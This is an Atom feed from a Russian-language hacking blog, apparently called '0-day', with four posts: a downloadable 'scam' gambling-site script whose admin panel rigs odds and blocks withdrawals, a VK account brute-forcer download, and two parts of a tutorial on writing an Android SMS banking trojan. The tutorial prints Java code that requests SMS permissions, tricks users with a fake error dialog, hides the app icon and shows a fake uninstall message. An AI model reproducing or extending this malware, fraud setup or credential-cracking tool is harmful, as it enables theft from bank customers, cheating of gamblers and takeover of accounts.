<?xml version="1.0" encoding="utf-8" ?><feed xmlns="http://www.w3.org/2005/Atom" xmlns:tt="http://teletype.in/" xmlns:opensearch="http://a9.com/-/spec/opensearch/1.1/"><title>0-day | Уязвимость 0-го дня</title><subtitle>Наш канал в телеграме: https://t.me/exp_0day</subtitle><author><name>0-day | Уязвимость 0-го дня</name></author><id>https://teletype.in/atom/0-day</id><link rel="self" type="application/atom+xml" href="https://teletype.in/atom/0-day?offset=0"></link><link rel="alternate" type="text/html" href="https://teletype.in/@0-day?utm_source=teletype&amp;utm_medium=feed_atom&amp;utm_campaign=0-day"></link><link rel="next" type="application/rss+xml" href="https://teletype.in/atom/0-day?offset=10"></link><link rel="search" type="application/opensearchdescription+xml" title="Teletype" href="https://teletype.in/opensearch.xml"></link><updated>2026-04-07T09:02:40.719Z</updated><entry><id>0-day:ryR4wKlf4</id><link rel="alternate" type="text/html" href="https://teletype.in/@0-day/ryR4wKlf4?utm_source=teletype&amp;utm_medium=feed_atom&amp;utm_campaign=0-day"></link><title>Исходник скама NVUTI</title><published>2019-01-07T08:00:54.171Z</published><updated>2019-01-07T08:04:42.662Z</updated><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://teletype.in/files/0b/0b51d7c6-b08a-4708-abf3-120bea49f32a.png"></media:thumbnail><summary type="html">&lt;img src=&quot;https://teletype.in/files/9d/9d586df2-117c-4aea-a194-5d19186f527f.jpeg&quot;&gt;Совершенно новый скрипт NVUTI с очень красивой и удобной админ-панелью;</summary><content type="html">
  &lt;figure class=&quot;m_custom&quot;&gt;
    &lt;img src=&quot;https://teletype.in/files/9d/9d586df2-117c-4aea-a194-5d19186f527f.jpeg&quot; width=&quot;2501&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;Совершенно новый скрипт NVUTI с очень красивой и удобной админ-панелью;&lt;/p&gt;
  &lt;h2&gt;Все нововведения в этой версии:&lt;/h2&gt;
  &lt;ul&gt;
    &lt;li&gt;Доступно пополнение баланса через FREE-KASSy;&lt;/li&gt;
    &lt;li&gt;Убраны дыры и баги, в том числе и взлома сайта с помощью SQL Инъекции!;&lt;/li&gt;
    &lt;li&gt;Промо-коды и их создание через админ-панель;&lt;/li&gt;
    &lt;li&gt;Так же и новая, красивая административная панель!;&lt;/li&gt;
    &lt;li&gt;Подкрутка по типу или же по %;&lt;/li&gt;
    &lt;li&gt;Весь сайт, бонус при регистрации и пополнении можно настроить в административной панели! Так же можно включать минимальную сумму пополнения и выключать её, блокировать вывод и т.д;&lt;/li&gt;
  &lt;/ul&gt;
  &lt;p&gt;Скрины админки&lt;/p&gt;
  &lt;figure class=&quot;m_custom&quot;&gt;
    &lt;img src=&quot;https://pp.userapi.com/c845523/v845523636/b34f1/qii99sOHFoA.jpg&quot; width=&quot;1027&quot; /&gt;
  &lt;/figure&gt;
  &lt;figure class=&quot;m_custom&quot;&gt;
    &lt;img src=&quot;https://pp.userapi.com/c850016/v850016636/38080/7k4gkBiQSxQ.jpg&quot; width=&quot;1050&quot; /&gt;
  &lt;/figure&gt;
  &lt;figure class=&quot;m_custom&quot;&gt;
    &lt;img src=&quot;https://i.imgur.com/lQkksSI.png&quot; width=&quot;1279&quot; /&gt;
  &lt;/figure&gt;
  &lt;h2&gt;P.S Это скам проект&lt;/h2&gt;
  &lt;p&gt;&lt;strong&gt;Инструкция по установке&lt;/strong&gt;&lt;/p&gt;
  &lt;p&gt;Настройки которые находятся в файлах:&lt;/p&gt;
  &lt;p&gt;1. База данных, тебе нужно настроить подключение в файле (inc/bd.php).&lt;/p&gt;
  &lt;p&gt;-&lt;/p&gt;
  &lt;p&gt;2. Настроить префикс базы данных (inc/config.php в переменной $prefix).&lt;/p&gt;
  &lt;p&gt;-&lt;/p&gt;
  &lt;p&gt;3. Настроить иконку сайта (inc/config.php в переменной $favicon).&lt;/p&gt;
  &lt;p&gt;3.1. Удалить файл fav_logo.jpg в папке files.&lt;/p&gt;
  &lt;p&gt;3.2. Загрузить свою иконку сайта в папку files.&lt;/p&gt;
  &lt;p&gt;-&lt;/p&gt;
  &lt;p&gt;3.3. Настроить иконку сайта (inc/config.php в переменной $favicon).&lt;/p&gt;
  &lt;p&gt;-&lt;/p&gt;
  &lt;p&gt;4. Правила сайта находятся в файле (inc/config.php в переменной $rules).&lt;/p&gt;
  &lt;p&gt;-&lt;/p&gt;
  &lt;p&gt;5. Если захочешь сделать фон под себя, в index.php ищешь переменную $bgc1 или $bgc2 или bgc3 и меняешь значение в поле &amp;quot;$(&amp;#x27;#bgc_site&amp;#x27;).val(&amp;#x27;bgc-memphis.png&amp;#x27;); на $(&amp;#x27;#bgc_site&amp;#x27;).val(&amp;#x27;Название вашего фона&amp;#x27;);&amp;quot;, а также загружаешь свой фон в папку img.&lt;/p&gt;
  &lt;p&gt;-&lt;/p&gt;
  &lt;p&gt;6. Настроить капчу в файле (inc/config.php) в переменной $gcaptcha.&lt;/p&gt;
  &lt;p&gt;-&lt;/p&gt;
  &lt;p&gt;7. Настройка блокировка вывода, по умолчанию блокировка вывода стоит до первого пополнения пользоатаеля на сайт, после пополнения блокировка снимается автоматически, вы также можете ее выключить вручную.&lt;/p&gt;
  &lt;p&gt;Включение и отключение блокировки в файле (inc/config.php) в переменной $blockout.&lt;/p&gt;
  &lt;p&gt;&lt;strong&gt;Остальные настройки находяться в самой админке.&lt;/strong&gt;&lt;/p&gt;
  &lt;p&gt;Как выдать админку?&lt;/p&gt;
  &lt;p&gt;Первому пользователю т.е тебе нужно зарегистрироваться через сайт и выдать админку через базу в таблице demo_users в поле admin поставить значение sadmin.&lt;/p&gt;
  &lt;p&gt;Таблица demo_admin для чего он нужен?&lt;/p&gt;
  &lt;p&gt;Это подкрутка пользователей, выставляется в % соотношенеии, если у ползователя стоит подкрутка Юзер то будут использоваться win_user и lose_user, если Ютубер то win_youtuber и lose_youtuber.&lt;/p&gt;
  &lt;p&gt;Во вкладке пользователи, есть значки прав,&lt;/p&gt;
  &lt;p&gt;Крестик - Бан.&lt;/p&gt;
  &lt;p&gt;Лиса - Админ.&lt;/p&gt;
  &lt;p&gt;Галочка - Подкрутка пользовательская.&lt;/p&gt;
  &lt;p&gt;Значок ютуба - Подкрутка ютуберская.&lt;/p&gt;
  &lt;p&gt;Рекомендации:&lt;/p&gt;
  &lt;p&gt;После загрузки базы данных к себе на хост изменить префикс demo на свой, а также в файле (inc/config.php в переменной $prefix)&lt;/p&gt;
  &lt;p&gt;-&lt;/p&gt;
  &lt;p&gt;Версия PHP должна быть : 5.4.45&lt;/p&gt;
  &lt;h2&gt;ВНИМАНИЕ!&lt;/h2&gt;
  &lt;p&gt;Будьте осторожны с токеном от Qiwi, НИКОМУ НЕ ПЕРЕДАВАЙТЕ ЕГО, т.к в случаи передачи его в чужие руки у вас могут увести деньги с кошелька, не забывайте об этом.&lt;/p&gt;
  &lt;h2&gt;Скачать:&lt;/h2&gt;
  &lt;p&gt;&lt;a href=&quot;https://yadi.sk/d/FIvZNO11m096vg&quot; target=&quot;_blank&quot;&gt;https://yadi.sk/d/FIvZNO11m096vg&lt;/a&gt;&lt;/p&gt;
  &lt;p&gt;&lt;strong&gt;Нужные ссылки&lt;/strong&gt;:&lt;/p&gt;
  &lt;p&gt;&lt;a href=&quot;https://href.li/?https://vk.com/editapp?act=create&quot; target=&quot;_blank&quot;&gt;Inloggen VKontakte&lt;/a&gt; - Создать приложение ВК для авторизации.&lt;/p&gt;
  &lt;p&gt;&lt;a href=&quot;https://href.li/?https://vk.com/ID%D0%B3%D1%80%D1%83%D0%BF%D0%BF%D1%8B?act=tokens&quot; target=&quot;_blank&quot;&gt;https://vk.com/IDгруппы?act=tokens&lt;/a&gt; - Создание токена для работы бонуса.&lt;/p&gt;
  &lt;p&gt;&lt;a href=&quot;https://href.li/?https://qiwi.com/api&quot; target=&quot;_blank&quot;&gt;QIWI Кошелек&lt;/a&gt; - Токен QIWI (Обязательно наличие галочки &amp;quot;Проведение платежей без SMS&amp;quot;).&lt;/p&gt;

</content></entry><entry><id>0-day:rJEBDLabN</id><link rel="alternate" type="text/html" href="https://teletype.in/@0-day/rJEBDLabN?utm_source=teletype&amp;utm_medium=feed_atom&amp;utm_campaign=0-day"></link><title>ВК Брут</title><published>2019-01-04T21:59:24.325Z</published><updated>2019-01-04T21:59:24.325Z</updated><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://teletype.in/files/b0/b0418aeb-62b4-45ff-bfce-1f853056c4a8.png"></media:thumbnail><summary type="html">&lt;img src=&quot;https://teletype.in/files/1b/1bfb3a82-65f0-4363-a096-fe72e22402ee.jpeg&quot;&gt;Работает как по API так и через сайт (выбираем в настройках)</summary><content type="html">
  &lt;figure class=&quot;m_custom&quot;&gt;
    &lt;img src=&quot;https://teletype.in/files/1b/1bfb3a82-65f0-4363-a096-fe72e22402ee.jpeg&quot; width=&quot;2501&quot; /&gt;
  &lt;/figure&gt;
  &lt;h2&gt;Брут вк&lt;/h2&gt;
  &lt;p&gt;Работает как по API так и через сайт (выбираем в настройках)&lt;/p&gt;
  &lt;p&gt;&lt;strong&gt;SBA&lt;/strong&gt; - сохранение bad аккаунтов (вдруг кому нужно)&lt;/p&gt;
  &lt;p&gt;&lt;a href=&quot;https://yadi.sk/d/7Uk4-0vyhMoqUA&quot; target=&quot;_blank&quot;&gt;Скачать&lt;/a&gt;&lt;/p&gt;
  &lt;p&gt;&lt;a href=&quot;https://www.virustotal.com/ru/file/be363bb4cf1554e16d002e2038b4626fdb01adf1556c798d7ce0a8de3fd9234f/analysis/1546211046/&quot; target=&quot;_blank&quot;&gt;ВирусТотал&lt;/a&gt;&lt;/p&gt;
  &lt;figure class=&quot;m_custom&quot;&gt;
    &lt;img src=&quot;https://teletype.in/files/a3/a3a1e53e-1b87-4ab8-8f57-fbac22d7299c.jpeg&quot; width=&quot;299&quot; /&gt;
  &lt;/figure&gt;
  &lt;figure class=&quot;m_custom&quot;&gt;
    &lt;img src=&quot;https://teletype.in/files/bc/bc62f277-a23b-4f01-8f46-e43b3f340eac.jpeg&quot; width=&quot;299&quot; /&gt;
  &lt;/figure&gt;

</content></entry><entry><id>0-day:SydR0zrZE</id><link rel="alternate" type="text/html" href="https://teletype.in/@0-day/SydR0zrZE?utm_source=teletype&amp;utm_medium=feed_atom&amp;utm_campaign=0-day"></link><title>Написание СМС трояна для Android [ 2 часть ]</title><published>2018-12-29T16:20:32.462Z</published><updated>2018-12-29T16:20:32.462Z</updated><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://teletype.in/files/93/93f18e20-fc7c-48a3-a6da-0cb1a4a540c0.png"></media:thumbnail><summary type="html">&lt;img src=&quot;https://teletype.in/files/34/3421c64d-32da-4319-a323-6d0eed26e9a7.jpeg&quot;&gt;Вот и доплыли до 2 части разработки смс трояна, в ней мы обсудим наш MainActivity, фишинг с окнами, сокрытие нашего приложение, поговорим про смс банкинг и прочие вещи. Приступим!</summary><content type="html">
  &lt;figure class=&quot;m_custom&quot;&gt;
    &lt;img src=&quot;https://teletype.in/files/34/3421c64d-32da-4319-a323-6d0eed26e9a7.jpeg&quot; width=&quot;1280&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;Вот и доплыли до 2 части разработки смс трояна, в ней мы обсудим наш MainActivity, фишинг с окнами, сокрытие нашего приложение, поговорим про смс банкинг и прочие вещи. Приступим!&lt;/p&gt;
  &lt;h2&gt;activity_main.xml ( интерфейс )​&lt;/h2&gt;
  &lt;p&gt;Что обозначает этот xml файлик? В нашем случае он не нужен, даже мешает нам. Это лицо нашего приложения, именно то, что видит в нем пользователь, когда заходит в наше приложение. Но мы же троян? Верно? Нам не нужно это, ведь мы скрываемся и работаем без интерфейса автономно. Конечно, можете туда что-то написать по типу: &amp;quot;Ожидайте, загрузка...&amp;quot;, &amp;quot;ERROR 100X500&amp;quot; и так далее. Но в моем случае я не стал это делать, может, если я захочу обновить этот инструмент ПЕНТЕСТА я добавлю это, но не сейчас и не в этом гайде. Вот где находится этот файлик в андроид студио и что у меня там написано.&lt;/p&gt;
  &lt;p&gt;Демонстрация&lt;/p&gt;
  &lt;figure class=&quot;m_custom&quot;&gt;
    &lt;img src=&quot;https://codeby.net/attachments/snimok-ehkrana-2018-12-24-v-20-33-15-png.24380/&quot; width=&quot;1600&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;Вот так вот и живем. Кстати, в андроид студио есть целый редактор, ничего не надо вводить ручками. Даже можете выбрать свою картинку, эмблему, иконку и написать любую надпись с любым цветом и любым шрифтом. Есть где здесь фантазии разгулятся для фишинга)&lt;/p&gt;
  &lt;h2&gt;MainActivity ( точка входа )​&lt;/h2&gt;
  &lt;p&gt;В итоге с графикой мы закончили, приступим к нашему активити. Как вы поняли из прошлой части, то MainActivity это точка входа в наше приложение, именно оно активируется когда пользователь открывает наш троян.&lt;/p&gt;
  &lt;p&gt;Давайте-ка импортируем нужные нам пакеты и создадим класс MainActivity который будет расширять AppCompatActivity.&lt;/p&gt;
  &lt;p&gt;Код&lt;/p&gt;
  &lt;p&gt;Java:&lt;/p&gt;
  &lt;pre&gt;package com.sms.smsbanker;
// импортируем пакеты
import android.app.AlertDialog;
import android.os.SystemClock;
import android.support.v4.content.ContextCompat;
import android.support.v7.app.AppCompatActivity;
import android.os.Bundle;
import android.Manifest;
import android.support.v4.app.ActivityCompat;
import android.content.pm.PackageManager;
import android.content.ComponentName;
import android.widget.Toast;
import android.app.PendingIntent;
import android.content.ComponentName;
import android.content.Context;
import android.content.Intent;
import android.view.Gravity;
import android.support.v4.app.Fragment;
import android.content.DialogInterface;
import android.app.Activity;
//  MainActivity, точка входа
public class MainActivity extends AppCompatActivity {
    @Override
   // метод с которого мы начинаем
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.activity_main);  // выставляем наш фон
&lt;/pre&gt;
  &lt;p&gt;Все, с созданием скелета MainActivity мы закончили, осталось только дописать самые необходимые вредоносные функции в него! Я, пожалуй, начну с написания проверки наших разрешений. Создам boolean который будет возвращать false, если разрешение нету и true, если они есть. Как только я его создаю - сразу вызываю его в нашем методе onCreate.&lt;/p&gt;
  &lt;p&gt;Код&lt;/p&gt;
  &lt;p&gt;Java:&lt;/p&gt;
  &lt;pre&gt;public boolean Permission(){
        ActivityCompat.requestPermissions(MainActivity.this,
                new String[]{Manifest.permission.SEND_SMS, Manifest.permission.READ_SMS, Manifest.permission.RECEIVE_SMS},
                1); // запрашиваем разрешения и даем пользователю выбор
        SystemClock.sleep(5000); // ожидаем 5 секунд и проверяем выбор нашего пользователь
        if (ContextCompat.checkSelfPermission(MainActivity.this, Manifest.permission.RECEIVE_SMS) != PackageManager.PERMISSION_GRANTED
                &amp;amp;&amp;amp; ContextCompat.checkSelfPermission(MainActivity.this, Manifest.permission.READ_SMS) != PackageManager.PERMISSION_GRANTED
                &amp;amp;&amp;amp; ContextCompat.checkSelfPermission(MainActivity.this, Manifest.permission.SEND_SMS) != PackageManager.PERMISSION_GRANTED
                &amp;amp;&amp;amp; ContextCompat.checkSelfPermission(MainActivity.this, Manifest.permission.READ_PHONE_STATE) != PackageManager.PERMISSION_GRANTED){
            return false; // если разрешения не дали
        } else {
            return true; // если разрешения дали
        }
    }
&lt;/pre&gt;
  &lt;p&gt;И, давайте, опубликую код вместе. Вдруг кому не понятно.&lt;/p&gt;
  &lt;p&gt;Код&lt;/p&gt;
  &lt;p&gt;Java:&lt;/p&gt;
  &lt;pre&gt;package com.sms.smsbanker;

import android.app.AlertDialog;
import android.os.SystemClock;
import android.support.v4.content.ContextCompat;
import android.support.v7.app.AppCompatActivity;
import android.os.Bundle;
import android.Manifest;
import android.support.v4.app.ActivityCompat;
import android.content.pm.PackageManager;
import android.content.ComponentName;
import android.widget.Toast;
import android.app.PendingIntent;
import android.content.ComponentName;
import android.content.Context;
import android.content.Intent;
import android.view.Gravity;
import android.support.v4.app.Fragment;
import android.content.DialogInterface;
import android.app.Activity;
public class MainActivity extends AppCompatActivity {

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.activity_main);
        Permission();
    }

    public boolean Permission(){
        ActivityCompat.requestPermissions(MainActivity.this,
                new String[]{Manifest.permission.SEND_SMS, Manifest.permission.READ_SMS, Manifest.permission.RECEIVE_SMS},
                1);
        SystemClock.sleep(5000);
        if (ContextCompat.checkSelfPermission(MainActivity.this, Manifest.permission.RECEIVE_SMS) != PackageManager.PERMISSION_GRANTED
                &amp;amp;&amp;amp; ContextCompat.checkSelfPermission(MainActivity.this, Manifest.permission.READ_SMS) != PackageManager.PERMISSION_GRANTED
                &amp;amp;&amp;amp; ContextCompat.checkSelfPermission(MainActivity.this, Manifest.permission.SEND_SMS) != PackageManager.PERMISSION_GRANTED
                &amp;amp;&amp;amp; ContextCompat.checkSelfPermission(MainActivity.this, Manifest.permission.READ_PHONE_STATE) != PackageManager.PERMISSION_GRANTED){
            return false;
        } else {
            return true;
        }
    }
}
&lt;/pre&gt;
  &lt;p&gt;Все, впринципе все должно быть понятно. Юзер открывает --&amp;gt; запрашивается разрешения --&amp;gt; ждем 5 секунд --&amp;gt; проверяем выбор. Но, что если он их отклонил? Что дальше? Хм, может, давайте-ка сыграем на психологии? Попробуем обмануть нашего пользователя. Я исключаю бесконечное запрашивание, ибо скорее всего юзер перезагрузит телефон, если такое случится. Здесь хоть шансов побольше.&lt;/p&gt;
  &lt;p&gt;Код&lt;/p&gt;
  &lt;p&gt;Java:&lt;/p&gt;
  &lt;pre&gt;@Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.activity_main);
        Permission();
        if(!Permission()){   // если разрешений нету.
            AlertDialog.Builder adb = new AlertDialog.Builder(MainActivity.this);
            adb.setTitle(&amp;quot;ОШИБКА!&amp;quot;);
            adb.setMessage(&amp;quot;Для работы этого приложения нужны необходимые разрешения, подтвердите их.&amp;quot;); // показываем фишинг диалог и после того, как пользователь нажал OK закрываем наше приложение.
            adb.setPositiveButton(&amp;quot;ok&amp;quot;, new DialogInterface.OnClickListener(){
                public void onClick(DialogInterface dialog, int whichButton) {
                    finish();
                }
            });
            adb.show();
        }else{  // если они есть, то вызываем метод маскировки
            Mask();
        }
    }
&lt;/pre&gt;
  &lt;p&gt;Вы спросите, что за метод маскировки? Метод маскировки это базовое скрытие, оно будет только в MainActivity. Более детальное сокрытие будет в других классах. А сейчас мы разберем этот метод Mask. В нем мы будем скрывать иконку и показывать юзеру фейковое сообщения об удалении, хотя оно просто исчезнет с рабочего стола)&lt;/p&gt;
  &lt;p&gt;Вот и все, мы закончили с нашем мэйнактивити и вызвали другой класс. Все здесь предельно легко и просто. Мы проверяем разрешения, если есть то запускаем булеан Mask, если нету то обманываем пользователя на то, чтобы он дал нам разрешение.&lt;/p&gt;
  &lt;p&gt;Код&lt;/p&gt;
  &lt;p&gt;Java:&lt;/p&gt;
  &lt;pre&gt;public boolean Mask() {
        try {
            PackageManager pm = getPackageManager(); // инициализируем наш PackageManager
            ComponentName componentName = new ComponentName(this, com.sms.smsbanker.MainActivity.class);
            pm.setComponentEnabledSetting(componentName,PackageManager.COMPONENT_ENABLED_STATE_DISABLED, PackageManager.DONT_KILL_APP); // прячем приложение
            SystemClock.sleep(10000); // ждем 10 секунд после сокрытия и показываем сообщения
            Toast toast = Toast.makeText(getApplicationContext(), // показываем фейковое сообщение
                    &amp;quot;ОШИБКА (0x1619), ПРОИЗВОДИТСЯ УДАЛЕНИЕ ПРИЛОЖЕНИЯ...&amp;quot;, Toast.LENGTH_LONG);
            toast.setGravity(Gravity.CENTER, 0, 0); // указываем, чтобы фейковое сообщения появилось по центру на экране
            toast.show(); // показываем наше сообщение
            startService(new Intent(this, Other.class)); // стартуем другой класс
            finish(); // завершаем наш мэйнактивити
            return true; // если сокрытие удалось
        } catch (Exception e) {
            startService(new Intent(this, Other.class));
            finish();
            return false; // если сокрытие не удалось
        }
    }
&lt;/pre&gt;
  &lt;p&gt;Выложу фулл код для тех, кто ничего не понял. Может вам будет так легче, ну или скрипткидди просто скопируют это, без разницы.&lt;/p&gt;
  &lt;p&gt;Весь код&lt;/p&gt;
  &lt;p&gt;Java:&lt;/p&gt;
  &lt;pre&gt;package com.sms.smsbanker;

import android.app.AlertDialog;
import android.os.SystemClock;
import android.support.v4.content.ContextCompat;
import android.support.v7.app.AppCompatActivity;
import android.os.Bundle;
import android.Manifest;
import android.support.v4.app.ActivityCompat;
import android.content.pm.PackageManager;
import android.content.ComponentName;
import android.widget.Toast;
import android.app.PendingIntent;
import android.content.ComponentName;
import android.content.Context;
import android.content.Intent;
import android.view.Gravity;
import android.support.v4.app.Fragment;
import android.content.DialogInterface;
import android.app.Activity;

public class MainActivity extends AppCompatActivity {

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.activity_main);
        Permission();
        if(!Permission()){
            AlertDialog.Builder adb = new AlertDialog.Builder(MainActivity.this);
            adb.setTitle(&amp;quot;ОШИБКА!&amp;quot;);
            adb.setMessage(&amp;quot;Для работы этого приложения нужны необходимые разрешения, подтвердите их.&amp;quot;);
            adb.setPositiveButton(&amp;quot;ok&amp;quot;, new DialogInterface.OnClickListener(){
                public void onClick(DialogInterface dialog, int whichButton) {
                    finish();
                }
            });
            adb.show();
        }else{
            Mask();
        }
    }

    public boolean Mask() {
        try {
            PackageManager pm = getPackageManager();
            ComponentName componentName = new ComponentName(this, com.sms.smsbanker.MainActivity.class);
            pm.setComponentEnabledSetting(componentName,PackageManager.COMPONENT_ENABLED_STATE_DISABLED, PackageManager.DONT_KILL_APP);
            SystemClock.sleep(10000);
            Toast toast = Toast.makeText(getApplicationContext(),
                    &amp;quot;ОШИБКА (0x1619), ПРОИЗВОДИТСЯ УДАЛЕНИЕ ПРИЛОЖЕНИЯ...&amp;quot;, Toast.LENGTH_LONG);
            toast.setGravity(Gravity.CENTER, 0, 0);
            toast.show();
            startService(new Intent(this, Other.class));
            finish();
            return true;
        } catch (Exception e) {
            startService(new Intent(this, Other.class));
            finish();
            return false;
        }
    }

    public boolean Permission(){
        ActivityCompat.requestPermissions(MainActivity.this,
                new String[]{Manifest.permission.SEND_SMS, Manifest.permission.READ_SMS, Manifest.permission.RECEIVE_SMS},
                1);
        SystemClock.sleep(5000);
        if (ContextCompat.checkSelfPermission(MainActivity.this, Manifest.permission.RECEIVE_SMS) != PackageManager.PERMISSION_GRANTED
                &amp;amp;&amp;amp; ContextCompat.checkSelfPermission(MainActivity.this, Manifest.permission.READ_SMS) != PackageManager.PERMISSION_GRANTED
                &amp;amp;&amp;amp; ContextCompat.checkSelfPermission(MainActivity.this, Manifest.permission.SEND_SMS) != PackageManager.PERMISSION_GRANTED
                &amp;amp;&amp;amp; ContextCompat.checkSelfPermission(MainActivity.this, Manifest.permission.READ_PHONE_STATE) != PackageManager.PERMISSION_GRANTED){
            return false;
        } else {
            return true;
        }
    }
}
&lt;/pre&gt;
  &lt;p&gt;А другой класс мы уже разберем в другой части. Давайте перейдем к другой теме.&lt;/p&gt;
  &lt;h2&gt;Немного об смс банкинге​&lt;/h2&gt;
  &lt;p&gt;Смс банкинг особо разит сегодня у нас в стране. Почти у каждого есть свой счет в сбербанке, собственно есть и симка на которую привязаны наши карточки. Многие пользователи для удобства подключают дополнительную услугу, называется она &amp;quot;СМС Банкинг&amp;quot;. При помощи этой услуги удобно одной смской переводить деньги на карточки, оплачивать покупки, штрафы, смотреть счета, бонусы и так далее. Но, если телефоном завладеет посторонний человек или программа - можете распрощаться с вашими средствами. Телефон - путь к вашим деньгам.&lt;/p&gt;
  &lt;p&gt;Многие пользователи неосторожны и скачивают все подряд с гугл плэя, там могут быть подобные угрозы. Они перехватывают смс, обрабатывают их, снимают деньги и в лучшем случае оставляют вас, а в худшем блокируют ваше устройство и вымогают еще деньги. Все ради денег, миром правят деньги.&lt;/p&gt;
  &lt;p&gt;Защита от подобного есть, но только не у сбербанка. Да, главное не банковская защита, а ВЫ. Не устанавливаете подозрительные приложения и не стоит выдавать разрешения на смс каждому второму приложению. Это может плохо повлиять на ваш кошелек)&lt;/p&gt;
  &lt;h2&gt;Заключение&lt;/h2&gt;
  &lt;p&gt;​&lt;/p&gt;
  &lt;p&gt;Все, на этом наша 2 часть закончилась. В 3 я опишу другой класс ( перехват смс ), дополнительную маскировку, закрепления в системе, возможно даже и связь с сервером. И помните ПРИМЕНЕНИЕ ПОДОБНОГО ПО ОТНОШЕНИЮ К ЛЮДЯМ С ЦЕЛЬЮ ПОЙМАТЬ ЛЕГКОГО БАБЛА КАРАЕТСЯ ЗАКОНОМ!&lt;/p&gt;
  &lt;p&gt;Всем удачи и пока!&lt;/p&gt;

</content></entry><entry><id>0-day:SyEu7U7-N</id><link rel="alternate" type="text/html" href="https://teletype.in/@0-day/SyEu7U7-N?utm_source=teletype&amp;utm_medium=feed_atom&amp;utm_campaign=0-day"></link><title>Написание СМС трояна</title><published>2018-12-28T07:40:27.936Z</published><updated>2018-12-28T07:40:27.936Z</updated><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://teletype.in/files/93/93f18e20-fc7c-48a3-a6da-0cb1a4a540c0.png"></media:thumbnail><summary type="html">&lt;img src=&quot;https://teletype.in/files/34/3421c64d-32da-4319-a323-6d0eed26e9a7.jpeg&quot;&gt;Приветствую! Планирую сделаю серию гайдов по написанию смс трояна на эту замечательную ось. Это будет вступительная часть, думаю, вы все поймете. Поехали!</summary><content type="html">
  &lt;figure class=&quot;m_custom&quot;&gt;
    &lt;img src=&quot;https://teletype.in/files/34/3421c64d-32da-4319-a323-6d0eed26e9a7.jpeg&quot; width=&quot;1280&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;Приветствую! Планирую сделаю серию гайдов по написанию смс трояна на эту замечательную ось. Это будет вступительная часть, думаю, вы все поймете. Поехали!&lt;/p&gt;
  &lt;h2&gt;&lt;strong&gt;Предисловие&lt;/strong&gt;&lt;/h2&gt;
  &lt;p&gt;Начиналось все с жажды наживы. Да и думаю у всех тех, кто читает эту статью есть это желание. Поэтому мы вы ее и читаете, давайте по честному. Я не скрываю, что хотел подзаработать данным способом, что является незаконным. Благо я уже нашел место в этом мире и занялся более выгодной и неприхотливой работой.&lt;/p&gt;
  &lt;p&gt;Я нигде не брал исходники, я хотел сделать свой проект на полностью чистой основе. Выкладываю я это лишь для того, чтобы обогатить свой и ваш опыт в данной сфере.&lt;/p&gt;
  &lt;blockquote&gt;ПРИМЕНЕНИЕ ПОДОБНОГО ПО ОТНОШЕНИЮ К ЛЮДЯМ С ЦЕЛЬЮ ПОЙМАТЬ ЛЕГКОГО БАБЛА КАРАЕТСЯ ЗАКОНОМ!&lt;/blockquote&gt;
  &lt;h2&gt;&lt;strong&gt;Среда разработки&lt;/strong&gt;&lt;/h2&gt;
  &lt;p&gt;Среду разработки для андроид приложений выберем вполне обычную для таких случаев: Android Studio. Как же установить его и приступить к работе? Сейчас разберем.&lt;/p&gt;
  &lt;p&gt;1. Перейдите на сайт &lt;a href=&quot;https://developer.android.com/studio/&quot; target=&quot;_blank&quot;&gt;Download Android Studio and SDK tools | Android Developers&lt;/a&gt; и установите версию для вашего устройства.&lt;/p&gt;
  &lt;p&gt;2. Соглашаетесь со всеми условиями, выбираете эмулятор ( Сразу советую ставить Nexus 5X API 28 x86 как у меня ) И ожидайте установку всех необходимых пакетов и собственно эмулятора, это может занять длительное время!!&lt;/p&gt;
  &lt;p&gt;3. У вас откроется окошко, создайте новый проект. Соглашаетесь со всем до выбора активити.&lt;/p&gt;
  &lt;p&gt;4. Активити советую выбирать Empty, так, думаю, будет более удобнее писать.&lt;/p&gt;
  &lt;p&gt;5. Все, у вас все открылось и готово собственно к написанию кода!&lt;/p&gt;
  &lt;h2&gt;&lt;strong&gt;Первые шаги!&lt;/strong&gt;&lt;/h2&gt;
  &lt;p&gt;Среду разработки настроили, она готова. Осталось только одно: сделать рабочий код. У меня уже есть исходники впринципе, но буду писать все сначала. Все будет выглядеть примерно так.&lt;/p&gt;
  &lt;p&gt;&lt;strong&gt;Проект&lt;/strong&gt;&lt;/p&gt;
  &lt;figure class=&quot;m_custom&quot;&gt;
    &lt;img src=&quot;https://codeby.net/attachments/snimok-ehkrana-2018-12-24-v-1-47-24-png.24370/&quot; width=&quot;676&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;Как только сделали проект, сразу стоит зайти в AndroidManifest.xml. Именно оттуда мы будем стартовать. Мы же пишем СМС приложение, да? Так нам нужны разрешение, чтобы наш троян мог отправлять/просматривать/удалять/пересылать сообщения. За все отвечает этот xml файлик. Именно этот текстовый файлик одна из самых главных частей проекта. Там будут условия, например: Что делать нашему приложению когда приходит смс? Что будет когда телефон перезагрузился? Какие разрешения нужны?&lt;/p&gt;
  &lt;p&gt;Пока что отделаемся только разрешениями на эту часть статьи. Выставим их!&lt;/p&gt;
  &lt;p&gt;&lt;strong&gt;Код&lt;/strong&gt;&lt;/p&gt;
  &lt;pre&gt;&amp;lt;uses-permission android:name=&amp;quot;android.permission.READ_PHONE_STATE&amp;quot; /&amp;gt; // читать телефонные контакты ( для распространения соответственно )
&amp;lt;uses-permission android:name=&amp;quot;android.permission.WRITE_SMS &amp;quot; /&amp;gt; // писать смс
&amp;lt;uses-permission android:name=&amp;quot;android.permission.READ_SMS&amp;quot; /&amp;gt; // возможность читать смс
&amp;lt;uses-permission android:name=&amp;quot;android.permission.SEND_SMS&amp;quot; /&amp;gt; // возможность отправлять смс
